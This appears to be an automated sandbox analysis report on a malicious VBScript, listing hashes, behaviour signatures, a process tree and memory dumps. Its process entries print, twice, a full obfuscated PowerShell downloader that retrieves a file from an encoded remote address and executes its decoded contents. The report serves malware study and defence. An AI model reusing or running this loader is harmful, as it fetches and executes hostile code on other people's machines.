Overview

overview

7

Static

static

1

fuggy.vbs

windows7-x64

3

fuggy.vbs

windows10-2004-x64

7

Analysis

  • max time kernel
    144s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231215-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system
  • submitted
    19/03/2024, 08:32

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    fuggy.vbs

  • Size

    7KB

  • MD5

    fc0fee432d7effb42c0133da090d4460

  • SHA1

    d336ddf9ce483de3dda6992419fe789cf283e2f5

  • SHA256

    c69ff9dd668c037efdf9c025bab748b7637347b2f3986150af396f30e5e77dd8

  • SHA512

    12922ca9b98f537d7373c1f2d6fbeecb917e0ada81d20268c5924d8dc3357b8bc4de92d1ba232df1d9844d3990d84063433466664beaab39fcdeef25a27d7ddd

  • SSDEEP

    192:Ouz5j1mG5NFw3rBPnuEDGOw6KE5x6/2jwDnbEaSoz9bVBm:T6uL658PHKwujwDbEszBm

Score
7/10

Malware Config

Signatures

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 5 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuggy.vbs"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:1736
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "++$Ganglioneural;++$Ganglioneural;$Ganglioneural=$Ganglioneural-1;Function Redisseizin ($Superaffiliation){$Caligate227=5;$Caligate227++;For($Exposing=5; $Exposing -lt $Superaffiliation.Length-1; $Exposing+=$Caligate227){$Sideteksters = 'substring';$Fandango=$Superaffiliation.$Sideteksters.Invoke($Exposing, 1);$Nonassimilative=$Nonassimilative+$Fandango}$Nonassimilative;}$Altstemmers=Redisseizin 'InterhTouret Mi.rt DefipSel,tsFiste:Necro/Unshe/Founte N iglHexacsMod.t. Sprocjordko Auto.Skvulm SvigzVa.ia/Rbdigi rmpimQtybof ,one/ OverZAnhydiProadg OppozGeomoaIndb.g Checsfanci.KerneaGelossKornti Orna ';$Recrusher=$Altstemmers.split([char]62);$Altstemmers=$Recrusher[0];$Cookshack=Redisseizin 'FreudiCircueOpsanxCorin ';$Recirkulerede = Redisseizin ' Tric\,enuks ecodykanals lejnwBomuloA,imaw Zoom6Overm4aibli\SporoWAbwatiReconnHass.dFilteoKomm.w BallsDetekPHardwoSottiwVe,etelonelrVentrSOvenohHelpleBun,llSa,tilHeter\Rebslv,tyrt1Titil. Indf0Defam\GotchpCerebo.etrawD mokebagprrRe,oustumulhYardse CentlContrlI,iti.,loseeRipplx UdpleNonta ';&($Cookshack) (Redisseizin 'Vor a$ TherF unmaj Ege.eUnexprFlincnAtletsEndeptT ansyDbef rLaagee Hil s utik=Bars $ E,caeUnhean Arrevgenne:malibwSekuliDemognElusid AlpeiSystergluco ') ;&($Cookshack) (Redisseizin 'Co,yo$ SubtREndopenon.ncTvej,iEsophr SpekkDanaiuHonnrlBes.oe.ksper akize UnfrdtzitzePooh,=Coral$PinhoFGuayujNedskeCon.erExcubnIndivsHyd ot P.ary Me.arGenereSubmisProga+Quar.$PatwaRGanese MilicDr,ftiadscirU.intkBarriuNonpulFo,raeRetrar,fkomeTaalmdSaccieSlick ') ;&($Cookshack) (Redisseizin 'Gucki$NonseBWaitieEnuncf Gwy,oErgonuO,ersl,ropheAnvendWhedo Medgr=Atom, Indg( Begm(Greeng,nsplw,klhamFed,aiSandh SharwStelli Uglen Ecto3Unbe.2Monoc_Milj,pLo,icr u.uroEcha.cSigmoeS.aths Tands Kno, Stile-helsvFTr,ut ,dskPsannhrSnuseoH,ejsc R.teeHexensFoldesScr.aITankrdt,ngl=Sleep$Juggi{Micr P signIovermDParkl}Funkt)Desor.StenrCTwanko Do.gmlinarmSulpha de.onUlivsd arisLUi dbi BijonOntaleBladm)Neuro Hem,d- T mtsPunctp Finml frihiS ilotBorva Parkg[CicatcFo tyhStoicaAthrortau f]Patho3Zhoun4Centr ');&($Cookshack) (Redisseizin 'C,mbu$TakkeTTraadrReaktyIndorkSlusekJivaraMegawmAgaver QuaneH ndbtJuleksOrtog Frus=Inse, Humif$Re.eaBOutt eWoodcfVarepo Fo kuOutmal ForfeBeskadU res[Emeti$ LimiBMaxime TartfSludro Farvu.remilManideDipsyd urs.Frej c Terzo,egimuUlke n .ampt Fish-Trimp2Galni]Vestv ');&($Cookshack) (Redisseizin 'Barmy$R uniRSectaeTllers DefopAn,imodec inStormdGreneeSquamn Martt WeldeNabonrKvistsForel=Suba,(ErhveT angfeA rjts PinotSnoga- .dstPLig,raDura.tapojohChemo Snaev$T lgaR aseeSerb.cAnsvaiKunstr VerdkFaulkuSammel MntteSubpar.eltpe CentdTilbaeAus,r)Rh do Sprog-HelheAWisten Overd ,auk Ingol(Ma ri[ SimuISeminn VicatTelteP,bsentMask rKrumn]Octos:Restp:BlndrsArbejiNarcsz.euzeeBlokb Hyper-Atomfe PervqAvifa Detra8 Ap e)Autoi ') ;if ($Respondenters) {.$Recirkulerede $Trykkamrets;} else {;$Overtrdelserne=Redisseizin 'InhumS rhvt .odkaIndu rMuldvtSparg-O.erlBOph,oi Go etSejlesAutenTOv rbr ApodaFora,nBrodesKommuf Ide.eBoastrNonsp Tomah- lavS overo storuLoan,rFigurcEuroceL nea Kurse$ In,vA Hugsl Snoot .mrasSparrtVailseRansmm chopmOplreeTenrerShyessStyri Tremp-,etydDMandse StrasAnsvatDio eiStoikn Ro.oaPelastNep.uiRe.akoFeminn uhj As,a$InnomFReserjVrighe ,odsrEkspenOmfansLandlt U,siyindbarNonseeArtiksC,mpu ';&($Cookshack) (Redisseizin ' renn$BeskuFDizzajudplueungrar ,ownnOverssTracttSkogryUdpibr n ndeCykels Unly=bi ns$.laimeForvrnCent vTelex:Sam aa SinipEvelipAandsd HoodaGelsetR,dela Bas, ') ;&($Cookshack) (Redisseizin 'EarthI ArgumFrednpP.trioBaserr KaretU gul-Ery.hMTempooWattmdFreshuIonisl AbodeJ len Sha,BBijouiSkandt anidsVarenT B,sirSini.agrobun E.tesJugsffBookmePottorOf.er ') ;$Fjernstyres=$Fjernstyres+'\Teaser.man';while (-not $Bortfragt) {&($Cookshack) (Redisseizin 'Rdtjr$B,getBRednio Gummr CouptGarbuf p.eirsjlebaMir kgImbr t.onad=Kraal(SvajmTPho.peSten s RoottEmbe.-tvivlPTempeaTic.ptAfmagh,ykke Snebo$Flok FMulcijGregke TogprMennenPsammsBailltVi.neyNonderRiddee ManusUn.ec)Kontr ') ;&($Cookshack) $Overtrdelserne;&($Cookshack) (Redisseizin 'HektaSBackat fll.aFondsr FrietPhere-PiedeS.nforl M rgeSampleParr pSam,e Melo 5Unfla ');$Altstemmers=$Recrusher[$Slotspladserne++%$Recrusher.count];}&($Cookshack) (Redisseizin ' Phen$CalmaFOprrslRulleuBluengIndtrt Nonan OmsaiMado,nArr,gg Disee,iverrFarsenForaaeCo.ke Forb=.melt ProcuGSawbeeTreelt nsuf-Alvo.CMolluoKalpinAggrotG dlieUbesknElkhotTrojk Bicam$SpgefFArtisjUnreve kattrPelvenForkfsAustrtClaviy com,r KapieK.mmas Voka ');&($Cookshack) (Redisseizin ',dite$PlateAbannocPunitc Kreb Agoni=Ungel Pichu[HypocSAdvokyBesmisM,dictbetruePre,tmRotat.oversCBaan,oRokernAz.ekvTr,pieUgeskr.quigtInstr]H ber:Stole:SavonFPseudrD,vuloConglm AcquBBurriaKaramsGe ope Mod.6 Udm,4 InteSHeavitFeltprUd.kaiFngsenEft,rg Goll(Excre$HleriFCa,etl par,udivergB.rett MagtnSu,fuiOperen Menngpo.noeS,athr,ryggn Samme Kobo) bise ');&($Cookshack) (Redisseizin 'Basis$LevefC Mr,hiVagi r ,ubhrK,ddloExactcEdnabuStraamrespiuSexovlCowpeuIndigsAfgrs De pi=Barbe Vacat[druidS AnoryBetvusAbbretnord.e,hermm,utpo.affalTKam.reStegexTo letRgsfl. exc.E Dec.nB jouc,maabo,odiedSma,biHa dhn Rum.g Fiss]Neut.:Smag,:storyAE strS D.giCV.kkeI SagnISeksr.EfferGCoarse Medft.otalS olytIndserImpacinonconDivisg None(Rombi$Unb pAEpi,acWait cE oph) D,sp ');&($Cookshack) (Redisseizin ' S.ve$ ps uUAffinn Rgeti eltevUnfixe ServrGodsfsOverpi K,lltAfkoge eletMomeneTiarmrSkydesDacia=Diere$ C crCTotemi MadorTapetrAssocohypnoc InteuEmigrmS.eleuFrugal Kom,uBu,desSkarp.Resers ScrfuTom.abPolytsReligt.unktr Hemoi todanZingag .ysi(Laugh3 alac1,olym8Tinsm6Triki2Bogsi7Ga de,pro,e2Rocki4Poli.9Disko1 Uroe2 Lred)Scarr ');&($Cookshack) $Universiteters;}"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3376
      • C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "++$Ganglioneural;++$Ganglioneural;$Ganglioneural=$Ganglioneural-1;Function Redisseizin ($Superaffiliation){$Caligate227=5;$Caligate227++;For($Exposing=5; $Exposing -lt $Superaffiliation.Length-1; $Exposing+=$Caligate227){$Sideteksters = 'substring';$Fandango=$Superaffiliation.$Sideteksters.Invoke($Exposing, 1);$Nonassimilative=$Nonassimilative+$Fandango}$Nonassimilative;}$Altstemmers=Redisseizin 'InterhTouret Mi.rt DefipSel,tsFiste:Necro/Unshe/Founte N iglHexacsMod.t. Sprocjordko Auto.Skvulm SvigzVa.ia/Rbdigi rmpimQtybof ,one/ OverZAnhydiProadg OppozGeomoaIndb.g Checsfanci.KerneaGelossKornti Orna ';$Recrusher=$Altstemmers.split([char]62);$Altstemmers=$Recrusher[0];$Cookshack=Redisseizin 'FreudiCircueOpsanxCorin ';$Recirkulerede = Redisseizin ' Tric\,enuks ecodykanals lejnwBomuloA,imaw Zoom6Overm4aibli\SporoWAbwatiReconnHass.dFilteoKomm.w BallsDetekPHardwoSottiwVe,etelonelrVentrSOvenohHelpleBun,llSa,tilHeter\Rebslv,tyrt1Titil. Indf0Defam\GotchpCerebo.etrawD mokebagprrRe,oustumulhYardse CentlContrlI,iti.,loseeRipplx UdpleNonta ';&($Cookshack) (Redisseizin 'Vor a$ TherF unmaj Ege.eUnexprFlincnAtletsEndeptT ansyDbef rLaagee Hil s utik=Bars $ E,caeUnhean Arrevgenne:malibwSekuliDemognElusid AlpeiSystergluco ') ;&($Cookshack) (Redisseizin 'Co,yo$ SubtREndopenon.ncTvej,iEsophr SpekkDanaiuHonnrlBes.oe.ksper akize UnfrdtzitzePooh,=Coral$PinhoFGuayujNedskeCon.erExcubnIndivsHyd ot P.ary Me.arGenereSubmisProga+Quar.$PatwaRGanese MilicDr,ftiadscirU.intkBarriuNonpulFo,raeRetrar,fkomeTaalmdSaccieSlick ') ;&($Cookshack) (Redisseizin 'Gucki$NonseBWaitieEnuncf Gwy,oErgonuO,ersl,ropheAnvendWhedo Medgr=Atom, Indg( Begm(Greeng,nsplw,klhamFed,aiSandh SharwStelli Uglen Ecto3Unbe.2Monoc_Milj,pLo,icr u.uroEcha.cSigmoeS.aths Tands Kno, Stile-helsvFTr,ut ,dskPsannhrSnuseoH,ejsc R.teeHexensFoldesScr.aITankrdt,ngl=Sleep$Juggi{Micr P signIovermDParkl}Funkt)Desor.StenrCTwanko Do.gmlinarmSulpha de.onUlivsd arisLUi dbi BijonOntaleBladm)Neuro Hem,d- T mtsPunctp Finml frihiS ilotBorva Parkg[CicatcFo tyhStoicaAthrortau f]Patho3Zhoun4Centr ');&($Cookshack) (Redisseizin 'C,mbu$TakkeTTraadrReaktyIndorkSlusekJivaraMegawmAgaver QuaneH ndbtJuleksOrtog Frus=Inse, Humif$Re.eaBOutt eWoodcfVarepo Fo kuOutmal ForfeBeskadU res[Emeti$ LimiBMaxime TartfSludro Farvu.remilManideDipsyd urs.Frej c Terzo,egimuUlke n .ampt Fish-Trimp2Galni]Vestv ');&($Cookshack) (Redisseizin 'Barmy$R uniRSectaeTllers DefopAn,imodec inStormdGreneeSquamn Martt WeldeNabonrKvistsForel=Suba,(ErhveT angfeA rjts PinotSnoga- .dstPLig,raDura.tapojohChemo Snaev$T lgaR aseeSerb.cAnsvaiKunstr VerdkFaulkuSammel MntteSubpar.eltpe CentdTilbaeAus,r)Rh do Sprog-HelheAWisten Overd ,auk Ingol(Ma ri[ SimuISeminn VicatTelteP,bsentMask rKrumn]Octos:Restp:BlndrsArbejiNarcsz.euzeeBlokb Hyper-Atomfe PervqAvifa Detra8 Ap e)Autoi ') ;if ($Respondenters) {.$Recirkulerede $Trykkamrets;} else {;$Overtrdelserne=Redisseizin 'InhumS rhvt .odkaIndu rMuldvtSparg-O.erlBOph,oi Go etSejlesAutenTOv rbr ApodaFora,nBrodesKommuf Ide.eBoastrNonsp Tomah- lavS overo storuLoan,rFigurcEuroceL nea Kurse$ In,vA Hugsl Snoot .mrasSparrtVailseRansmm chopmOplreeTenrerShyessStyri Tremp-,etydDMandse StrasAnsvatDio eiStoikn Ro.oaPelastNep.uiRe.akoFeminn uhj As,a$InnomFReserjVrighe ,odsrEkspenOmfansLandlt U,siyindbarNonseeArtiksC,mpu ';&($Cookshack) (Redisseizin ' renn$BeskuFDizzajudplueungrar ,ownnOverssTracttSkogryUdpibr n ndeCykels Unly=bi ns$.laimeForvrnCent vTelex:Sam aa SinipEvelipAandsd HoodaGelsetR,dela Bas, ') ;&($Cookshack) (Redisseizin 'EarthI ArgumFrednpP.trioBaserr KaretU gul-Ery.hMTempooWattmdFreshuIonisl AbodeJ len Sha,BBijouiSkandt anidsVarenT B,sirSini.agrobun E.tesJugsffBookmePottorOf.er ') ;$Fjernstyres=$Fjernstyres+'\Teaser.man';while (-not $Bortfragt) {&($Cookshack) (Redisseizin 'Rdtjr$B,getBRednio Gummr CouptGarbuf p.eirsjlebaMir kgImbr t.onad=Kraal(SvajmTPho.peSten s RoottEmbe.-tvivlPTempeaTic.ptAfmagh,ykke Snebo$Flok FMulcijGregke TogprMennenPsammsBailltVi.neyNonderRiddee ManusUn.ec)Kontr ') ;&($Cookshack) $Overtrdelserne;&($Cookshack) (Redisseizin 'HektaSBackat fll.aFondsr FrietPhere-PiedeS.nforl M rgeSampleParr pSam,e Melo 5Unfla ');$Altstemmers=$Recrusher[$Slotspladserne++%$Recrusher.count];}&($Cookshack) (Redisseizin ' Phen$CalmaFOprrslRulleuBluengIndtrt Nonan OmsaiMado,nArr,gg Disee,iverrFarsenForaaeCo.ke Forb=.melt ProcuGSawbeeTreelt nsuf-Alvo.CMolluoKalpinAggrotG dlieUbesknElkhotTrojk Bicam$SpgefFArtisjUnreve kattrPelvenForkfsAustrtClaviy com,r KapieK.mmas Voka ');&($Cookshack) (Redisseizin ',dite$PlateAbannocPunitc Kreb Agoni=Ungel Pichu[HypocSAdvokyBesmisM,dictbetruePre,tmRotat.oversCBaan,oRokernAz.ekvTr,pieUgeskr.quigtInstr]H ber:Stole:SavonFPseudrD,vuloConglm AcquBBurriaKaramsGe ope Mod.6 Udm,4 InteSHeavitFeltprUd.kaiFngsenEft,rg Goll(Excre$HleriFCa,etl par,udivergB.rett MagtnSu,fuiOperen Menngpo.noeS,athr,ryggn Samme Kobo) bise ');&($Cookshack) (Redisseizin 'Basis$LevefC Mr,hiVagi r ,ubhrK,ddloExactcEdnabuStraamrespiuSexovlCowpeuIndigsAfgrs De pi=Barbe Vacat[druidS AnoryBetvusAbbretnord.e,hermm,utpo.affalTKam.reStegexTo letRgsfl. exc.E Dec.nB jouc,maabo,odiedSma,biHa dhn Rum.g Fiss]Neut.:Smag,:storyAE strS D.giCV.kkeI SagnISeksr.EfferGCoarse Medft.otalS olytIndserImpacinonconDivisg None(Rombi$Unb pAEpi,acWait cE oph) D,sp ');&($Cookshack) (Redisseizin ' S.ve$ ps uUAffinn Rgeti eltevUnfixe ServrGodsfsOverpi K,lltAfkoge eletMomeneTiarmrSkydesDacia=Diere$ C crCTotemi MadorTapetrAssocohypnoc InteuEmigrmS.eleuFrugal Kom,uBu,desSkarp.Resers ScrfuTom.abPolytsReligt.unktr Hemoi todanZingag .ysi(Laugh3 alac1,olym8Tinsm6Triki2Bogsi7Ga de,pro,e2Rocki4Poli.9Disko1 Uroe2 Lred)Scarr ');&($Cookshack) $Universiteters;}"
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4844
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 4844 -s 2244
          4⤵
          • Program crash
          PID:2284
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 176 -p 4844 -ip 4844
    1⤵
      PID:1468

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_nnvne2ue.ctq.ps1
      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      Download Submit

    • memory/3376-0-0x00000271CB930000-0x00000271CB952000-memory.dmp

      Filesize

      136KB

      Download

    • memory/3376-10-0x00007FFE27160000-0x00007FFE27C21000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/3376-11-0x00000271CB8F0000-0x00000271CB900000-memory.dmp

      Filesize

      64KB

      Download

    • memory/3376-12-0x00000271CB8F0000-0x00000271CB900000-memory.dmp

      Filesize

      64KB

      Download

    • memory/3376-13-0x00000271CB8F0000-0x00000271CB900000-memory.dmp

      Filesize

      64KB

      Download

    • memory/3376-44-0x00007FFE27160000-0x00007FFE27C21000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/4844-21-0x00000000060D0000-0x0000000006136000-memory.dmp

      Filesize

      408KB

      Download

    • memory/4844-33-0x0000000006810000-0x000000000685C000-memory.dmp

      Filesize

      304KB

      Download

    • memory/4844-16-0x00000000052E0000-0x00000000052F0000-memory.dmp

      Filesize

      64KB

      Download

    • memory/4844-18-0x0000000005920000-0x0000000005F48000-memory.dmp

      Filesize

      6.2MB

      Download

    • memory/4844-19-0x0000000005F50000-0x0000000005F72000-memory.dmp

      Filesize

      136KB

      Download

    • memory/4844-14-0x0000000005220000-0x0000000005256000-memory.dmp

      Filesize

      216KB

      Download

    • memory/4844-20-0x0000000005FF0000-0x0000000006056000-memory.dmp

      Filesize

      408KB

      Download

    • memory/4844-29-0x0000000006200000-0x0000000006554000-memory.dmp

      Filesize

      3.3MB

      Download

    • memory/4844-32-0x00000000067F0000-0x000000000680E000-memory.dmp

      Filesize

      120KB

      Download

    • memory/4844-17-0x00000000052E0000-0x00000000052F0000-memory.dmp

      Filesize

      64KB

      Download

    • memory/4844-35-0x0000000006DB0000-0x0000000006DCA000-memory.dmp

      Filesize

      104KB

      Download

    • memory/4844-34-0x00000000081A0000-0x000000000881A000-memory.dmp

      Filesize

      6.5MB

      Download

    • memory/4844-37-0x00000000079F0000-0x0000000007A12000-memory.dmp

      Filesize

      136KB

      Download

    • memory/4844-36-0x0000000007A60000-0x0000000007AF6000-memory.dmp

      Filesize

      600KB

      Download

    • memory/4844-38-0x0000000008820000-0x0000000008DC4000-memory.dmp

      Filesize

      5.6MB

      Download

    • memory/4844-39-0x0000000007E40000-0x0000000007E62000-memory.dmp

      Filesize

      136KB

      Download

    • memory/4844-40-0x0000000007EE0000-0x0000000007EF4000-memory.dmp

      Filesize

      80KB

      Download

    • memory/4844-41-0x0000000074BF0000-0x00000000753A0000-memory.dmp

      Filesize

      7.7MB

      Download

    • memory/4844-15-0x0000000074BF0000-0x00000000753A0000-memory.dmp

      Filesize

      7.7MB

      Download